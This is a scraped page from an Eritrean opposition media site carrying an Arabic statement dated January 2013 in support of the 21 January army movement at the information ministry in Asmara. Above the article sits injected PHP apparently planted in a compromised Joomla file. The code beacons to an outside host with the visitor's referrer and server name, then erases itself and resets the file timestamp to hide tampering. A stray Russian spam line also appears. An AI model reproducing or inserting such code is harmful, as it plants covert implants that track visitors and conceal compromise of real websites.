check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } كلمة اعلام عركوكباي: حركة 21 يناير
кремлевская диета

كلمة اعلام عركوكباي: حركة 21 يناير

User Rating: / 4
PoorBest 

 

 

 

 

 

" حركة 21 يناير "

 

           في الذكرى العشرون لتحرير ارتريا كتبنا هذه الكلمات (مرعشرون عاماً وزاد خلالها اللاجئون والمضطهدون ، مرَ عشرون عاماً ومازال الاريتري يحلم بحرية الرأي والإعلام وحياة كريمة في وطنه  ، مرَ عشرون عاما ومازال الآخرون يتساءلون أين هي اريتريا ومن أين انتم ؟؟؟ عجزنا أن نكون كغيرنا أن تكون وطننا ملجئنا وليس سبب لجوؤنا ، لكن لا نعلم ربما ما نعيشه هو الظلام الحالك الذي يسبق الفجر المشرق).

          والان نقول .. إن استقلال ارتريا لم يكن هبة من أحد لشعبها بل كان نتيجة لتضحيات و نضال  مرير خلال عقود من الزمن من قبل ابنائها . وقد تنوعت تضحيات الشعب الارتري بين من  تحمل ويلات الاحتلال في الداخل وبين من استسلم مجبراً للجوء وقساوة الغربة والهجرة . ومجموعة أخرى وهم الأبطال الذين ضحوا بأرواحهم وشبابهم وأهدافهم الشخصية من أجل ارتريا حتى نيل التحرير والاستقلال وهم  المناضلون  الذين فرقتهم الحياة بعد الاستقلال مابين من غيبهم الموت وآخرون يقبعون في المعتقلات التي أوجدها رفقاء دربهم وآخرون هربوا فراراً من بطشهم . وبقيت ارتريا المستقلة لمدة عقدين تحت حكم فئة مسيطرة ناسية تاريخ النضال وأسباب الثورة الارترية والتي كانت حرية الإنسان الارتري من اولوياتها ، وحقه في العيش الكريم في وطنه بكرامة وآمن .

          ولأن المناضل الارتري أعتاد على تقديم أولويات الوطن على مصلحته  الذاتية فقد بقيت فئة من المناضلين بعضها في السلطة وأخرى نالها الظلم والتهميش بالتساوي مع جيل الاستقلال الذي نال نصيبه من الاضطهاد بدلا من أن ينعم بالحياة الكريمة في وطنه . ولذا فإن هذه الفئة  قد قامت بعدة حركات من أجل التغيير و الإصلاح خلال العقدين الماضيين وكانت أول هذه المطالب في عام 1993 والتي قام بها المناضلون بعد إعلان الاستقلال وكان أبرزهم معاقي الحرب.  ومن ثم عام 1996 . والمطالبة قبل الأخيرة بعد حرب " بادمي " مع اثيوبيا عام 2001 والتي قام بها من كانوا في  السلطة الحاكمة وكانت  نتيجتها اعتقال 15 من الوزراء ومسئولي كبار الدولة .

          وفي ظل ثورات الربيع العربي كان لابد أن تاتي نسمات التغيير لإرتريا وذلك للمطالبة بالتغيير وقد كان . ففي يوم الاثنين الموافق 21 يناير 2013 حاصر حوالي (200) جندي  مزودين بدبابتين مبنى وزارة الإعلام الارترية في العاصمة اسمرا . وتم قطع البث التلفزيوني والإذاعي بعد ان بثت الحركة مطالبها ، وعاد البث في وقت متأخر من مساء الاثنين  .  ووفقاً لمصادر عدة فإن مطالب الحركة كان تفعيل دستور 1997 وإطلاق سراح المعتقلين السياسيين  من السجون .

           وتأتي هذه الحركة بعد خيبة الأمل التي أصابت الجيش والشعب الارتري مع بداية السنة الميلادية 2013 حيث كان الجميع يتوقع  بعض الإصلاحات من قبل رئيس النظام الحاكم اسياس أفورقي . ويقود الحركة العقيد صالح عثمان إلا أنه  ليس هناك أي أخبار مؤكدة عن قيادة هذه الحركة وما الذي يتم في داخل ارتريا بسبب التعتيم الذي فرضه النظام على الدولة منذ سنوات طويلة .

          ونحن في إعـــلام عركوكباي نبارك ونشيد بحركة 21 يناير والتي تعتبر خطوة كبيرة من أجل التغيير الذي طال انتظاره في ارتريا حتى ينعم أهلها بسيادة القانون والحكم الديمقراطي . ونؤكد ومطالبتنا للحفاظ على الطريقة السلمية التي بدأتها الحركة. وكأن الشروق الثاني لارتريا قد بدأت تظهر شعاعه فندعوا المولى  أن يكون النجاح نصيب هذه الحركة وأن يحفظ الله ارتريا وأهلها من كل سوء .

إعـلام عركوكباي

24 يناير 2013

This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player